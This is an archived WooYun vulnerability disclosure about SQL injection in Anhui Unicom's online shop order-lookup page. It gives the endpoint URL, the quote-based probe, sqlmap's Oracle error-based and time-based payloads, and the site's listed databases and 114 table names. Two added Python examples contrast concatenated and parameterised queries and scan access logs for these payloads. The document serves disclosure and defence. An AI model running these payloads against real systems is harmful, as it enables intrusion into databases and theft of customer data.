WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
2014-09-09: Details sent to the vendor, awaiting vendor response
2014-09-14: Vendor has confirmed; details disclosed to the vendor only
2014-09-24: Details disclosed to core white hats and relevant domain experts
2014-10-04: Details disclosed to regular white hats
2014-10-14: Details disclosed to intern white hats
2014-10-24: Details disclosed to the public
China Unicom
Anhui Unicom online shop: http://www.ah165.net/shop/
Click "My Orders".
Enter a in both the ID number and order number fields, then click Query.
Replace a with a' and query again.
Capture the request.
http://www.ah165.net/shop/order/query/list?time=1410239213386&cardType=1&ecwmp_page_curPage=1&ecwmp_page_pageSize=10&idCard=a&id_orderSn=a
Injection point: http://www.ah165.net/shop/order/query/list?time=1410239213386&cardType=1&ecwmp_page_curPage=1&ecwmp_page_pageSize=10&idCard=a&id_orderSn=a
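The a / a' probe above works because the order-lookup query is assembled from the request parameters as SQL text, so a stray quote breaks the statement and a tautology changes its meaning. The following is an added example, not code from the report or from the shop's own JSP code base: it models the lookup in Python with an in-memory SQLite table (a stand-in for the Oracle back end; the table and column names are assumed) and shows the concatenated query beside its parameterised replacement, classifying each lookup the way the probe in the report observes it.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the shop's order table (names are assumptions)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE tb_order (order_sn TEXT, id_card TEXT, card_type INTEGER)")
    con.executemany(
        "INSERT INTO tb_order VALUES (?, ?, ?)",
        [("SN1001", "340100199001011234", 1), ("SN1002", "340100199202022345", 2)],
    )
    return con

def query_orders_vulnerable(con, card_type: str, id_card: str, order_sn: str):
    # String concatenation: every request parameter becomes SQL syntax.
    # The parentheses around card_type mirror the "1) AND ... (" shape of
    # the sqlmap payload in the report.
    sql = ("SELECT order_sn FROM tb_order WHERE (card_type = " + card_type
           + ") AND id_card = '" + id_card + "' AND order_sn = '" + order_sn + "'")
    return [r[0] for r in con.execute(sql)]

def query_orders_safe(con, card_type: str, id_card: str, order_sn: str):
    # Parameterised query: values travel as bind variables, never as syntax.
    # card_type is coerced to int first, so non-numeric input is rejected
    # before any SQL is built.
    ct = int(card_type)  # raises ValueError for "1) AND (1=1" and friends
    sql = ("SELECT order_sn FROM tb_order "
           "WHERE card_type = ? AND id_card = ? AND order_sn = ?")
    return [r[0] for r in con.execute(sql, (ct, id_card, order_sn))]

def probe_result(fn, con, card_type: str, id_card: str, order_sn: str) -> str:
    """Classify one lookup as the black-box probe sees it:
    'rows', 'empty', 'sql-error' (the a' symptom) or 'rejected' (input validation)."""
    try:
        rows = fn(con, card_type, id_card, order_sn)
    except sqlite3.Error:
        return "sql-error"
    except ValueError:
        return "rejected"
    return "rows" if rows else "empty"

if __name__ == "__main__":
    con = make_db()
    for label, fn in (("vulnerable", query_orders_vulnerable), ("safe", query_orders_safe)):
        print(label, "a  ->", probe_result(fn, con, "1", "a", "a"))
        print(label, "a' ->", probe_result(fn, con, "1", "a'", "a"))
```

With the concatenated version the a' input produces a database error (an unterminated string literal), which is exactly the difference in behaviour the report used to spot the bug; with bind variables the same input is simply a value that matches nothing, and a non-integer cardType never reaches the database at all. In the JSP application this corresponds to using PreparedStatement with setInt/setString instead of building the statement with string concatenation.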
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cardType
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
    Payload: time=1410239213386&cardType=1) AND 9251=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(121)||CHR(115)||CHR(113)||(SELECT (CASE WHEN (9251=9251) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(114)||CHR(115)||CHR(107)||CHR(113)) AND (2239=2239&ecwmp_page_curPage=1&ecwmp_page_pageSize=10&idCard=a&id_orderSn=a

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: time=1410239213386&cardType=1) AND 6622=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (1454=1454&ecwmp_page_curPage=1&ecwmp_page_pageSize=10&idCard=a&id_orderSn=a
---
web application technology: JSP
back-end DBMS: Oracle
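Both techniques sqlmap confirmed above leave recognisable traces in the web server's access log: the error-based payload carries UTL_INADDR.GET_HOST_ADDRESS and long CHR()||CHR() chains, the time-based one a self-joined ALL_USERS count, and both put non-numeric text into cardType. The following is an added example, not part of the report: a small Python scanner that parses constructed access-log lines in common log format for this endpoint (IP addresses and timestamps are made up; the payloads are the two shown above, URL-encoded the way a browser or sqlmap would send them) and flags the requests a defender would want alerted on.

```python
import re
from urllib.parse import urlsplit, parse_qs, quote

# Parameters the order-lookup endpoint only ever receives as integers
# (taken from the request URL in the report).
NUMERIC_PARAMS = {"time", "cardType", "ecwmp_page_curPage", "ecwmp_page_pageSize"}

# Signatures for the two Oracle techniques sqlmap confirmed on this endpoint.
SIGNATURES = {
    "oracle-error-based": re.compile(r"UTL_INADDR\.GET_HOST_ADDRESS", re.I),
    "oracle-heavy-query": re.compile(r"FROM\s+ALL_USERS\s+\w+\s*,\s*ALL_USERS", re.I),
    "chr-concat": re.compile(r"(?:CHR\(\d+\)\s*\|\|\s*){3,}", re.I),
}

# Request line inside a common-log-format entry: "GET /path?query HTTP/1.1"
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def inspect_request(target: str):
    """Return the reasons a request target (path + query string) looks like SQL injection."""
    reasons = []
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)  # percent-decodes values
    for name, values in qs.items():
        for v in values:
            if name in NUMERIC_PARAMS and not v.isdigit():
                reasons.append(f"non-numeric {name}")
            if "'" in v:
                reasons.append(f"quote in {name}")
            for label, pat in SIGNATURES.items():
                if pat.search(v):
                    reasons.append(f"{label} in {name}")
    return sorted(set(reasons))

def scan_log(lines):
    """Yield one hit per log line whose request carries at least one indicator."""
    hits = []
    for line in lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        reasons = inspect_request(m.group("target"))
        if reasons:
            hits.append({"target": m.group("target"), "reasons": reasons})
    return hits

# Constructed sample log. The two sqlmap payloads are those from the report;
# quote() encodes them as they would appear on the wire.
PATH = "/shop/order/query/list"
BENIGN = "time=1410239213386&cardType=1&ecwmp_page_curPage=1&ecwmp_page_pageSize=10&idCard=a&id_orderSn=a"
PROBE = "time=1410239213386&cardType=1&ecwmp_page_curPage=1&ecwmp_page_pageSize=10&idCard=a'&id_orderSn=a"
ERROR_BASED = ("time=1410239213386&cardType=1) AND 9251=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||"
               "CHR(121)||CHR(115)||CHR(113)||(SELECT (CASE WHEN (9251=9251) THEN 1 ELSE 0 END) FROM DUAL)"
               "||CHR(113)||CHR(114)||CHR(115)||CHR(107)||CHR(113)) AND (2239=2239"
               "&ecwmp_page_curPage=1&ecwmp_page_pageSize=10&idCard=a&id_orderSn=a")
HEAVY_QUERY = ("time=1410239213386&cardType=1) AND 6622=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,"
               "ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (1454=1454"
               "&ecwmp_page_curPage=1&ecwmp_page_pageSize=10&idCard=a&id_orderSn=a")

def log_line(ts: str, query: str, status: int) -> str:
    return f'203.0.113.5 - - [{ts}] "GET {PATH}?{quote(query, safe="=&")} HTTP/1.1" {status} 512'

LOG_LINES = [
    log_line("09/Sep/2014:13:06:53 +0800", BENIGN, 200),
    log_line("09/Sep/2014:13:07:10 +0800", PROBE, 500),
    log_line("09/Sep/2014:13:09:41 +0800", ERROR_BASED, 500),
    log_line("09/Sep/2014:13:09:42 +0800", HEAVY_QUERY, 200),
]

if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(", ".join(hit["reasons"]))
```

The "non-numeric cardType" rule is the one worth keeping even after the signatures age: it encodes what the endpoint actually accepts, so it catches a future payload that uses none of the Oracle functions above. The heavy-query signature is also a useful hint for the database side, where a burst of ALL_USERS cross joins shows up as sudden CPU load on an otherwise idle schema.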
Databases
available databases [19]:
[*] AHECWMP
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
Database: AHECWMP
[114 tables]
+----------------------------+
| TB_ACTIVITY_PAGE           |
| TB_AGENT                   |
| TB_AGENT_APPLY             |
| TB_AGENT_ARTICLE           |
| TB_AGENT_DEVELOP_SITE      |
| TB_AGENT_EMPLOYEE          |
| TB_AGENT_PAYMENT           |
| TB_AGENT_SERV              |
| TB_AGENT_SHOWCASE          |
| TB_AGENT_STAFF             |
| TB_AGREEMENT               |
| TB_ARRIVAL_NOTICE          |
| TB_ARTICLE                 |
| TB_ARTICLE_CATEGORY        |
| TB_BSS_AGENT               |
| TB_BSS_MOBILE              |
| TB_BSS_MOBILE_LOG          |
| TB_BSS_MOBILE_OUT          |
| TB_BUSINESS_HALL           |
| TB_CLICKSTREAM             |
| TB_CLICKSTREAM_REQUESTS    |
| TB_CLUB_EXPERT             |
| TB_CLUB_MEMBER             |
| TB_COMMISSION_DEAL         |
| TB_COMMISSION_EXCEL        |
| TB_COMMISSION_LOG          |
| TB_COMMISSION_RULE         |
| TB_COMMISSION_RULE_AGENT   |
| TB_COMMISSION_RULE_NETCARD |
| TB_CONTRACT                |
| TB_CONTRACT_DETAIL         |
| TB_CONTRACT_DETAIL_BAK     |
| TB_CONTRACT_DETAIL_BAK1    |
| TB_CONTRACT_TEMPLATE       |
| TB_COUPON                  |
| TB_COUPON_CODE             |
| TB_COURSE                  |
| TB_COURSE_APPLY            |
| TB_COURSE_SCHEDULE         |
| TB_CPS_CODE                |
| TB_CPS_LOG                 |
| TB_CPS_YIQIFA              |
| TB_CUSTOMER                |
| TB_DELIVERY_CORP           |
| TB_DELIVERY_TYPE           |
| TB_DEVELOP_SITE            |
| TB_EMAIL_SENDLIST          |
| TB_FRIEND_LINK             |
| TB_GOODS                   |
| TB_GOODS_ACTIVITY          |
| TB_GOODS_AGENT             |
| TB_GOODS_AGENT_BAK         |
| TB_GOODS_AREA              |
| TB_GOODS_ATTRIBUTE         |
| TB_GOODS_BRAND             |
| TB_GOODS_CATEGORY          |
| TB_GOODS_EXTEND            |
| TB_GOODS_STORE             |
| TB_MEMBER                  |
| TB_MOBILE                  |
| TB_MOBILE_BUSINESS         |
| TB_MOBILE_GOODS            |
| TB_MOBILE_GRADE            |
| TB_MOBILE_GRADE_BAK        |
| TB_MOBILE_LOG              |
| TB_MOBILE_OUT              |
| TB_MOBILE_PLUGIN           |
| TB_MOBILE_RULE             |
| TB_MOBILE_RULE_LIB         |
| TB_MOBILE_RULE_SUIT        |
| TB_MOBILE_STATUS           |
| TB_MT                      |
| TB_ORDER                   |
| TB_ORDER_ITEM              |
| TB_ORDER_LOG               |
| TB_ORDER_REVIEW            |
| TB_ORDER_TWICE             |
| TB_PAYMENT                 |
| TB_PAYMENT_CONFIG          |
| TB_PREBOOK_MOBILE          |
| TB_REFEREE                 |
| TB_REFUND                  |
| TB_REGIONAL                |
| TB_REPORT_STORE            |
| TB_SCORE_LOG               |
| TB_SCORE_RULE              |
| TB_SHIPPING                |
| TB_SHOWCASE                |
| TB_SHOWCASE_GOODS          |
| TB_STAFF_DEVELOP_CHANNEL   |
| TB_STORE_BOOK              |
| TB_SUIT                    |
| TB_SUIT_CARD               |
| TB_SUIT_CONTRACT           |
| TB_TRIAL_CARD_APPLY        |
| TB_UNICOM_ORDER            |
| TB_UNICOM_ORDER_FILE       |
| TB_VAA_BAK                 |
| TB_VAS                     |
| TB_VAS_CONFIG              |
| TMP_GOODS                  |
| TP_PUB_AREA                |
| TP_PUB_COUNTY              |
| TP_PUB_INTE_AUTH           |
| TP_PUB_IP_ADDRESS          |
| TP_PUB_LOG                 |
| TP_PUB_MENU                |
| TP_PUB_PARA                |
| TP_PUB_PURVIEW             |
| TP_PUB_ROLE                |
| TP_PUB_SITE                |
| TP_PUB_STAFF               |
| TP_PUB_STAFF_BAK           |
| TP_PUB_STAFF_ROLE          |
+----------------------------+
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-09-14 12:02
CNVD has confirmed and reproduced the reported issue; it has been forwarded by CNCERT to the Anhui branch centre, which will coordinate remediation with the site's operating unit.
None.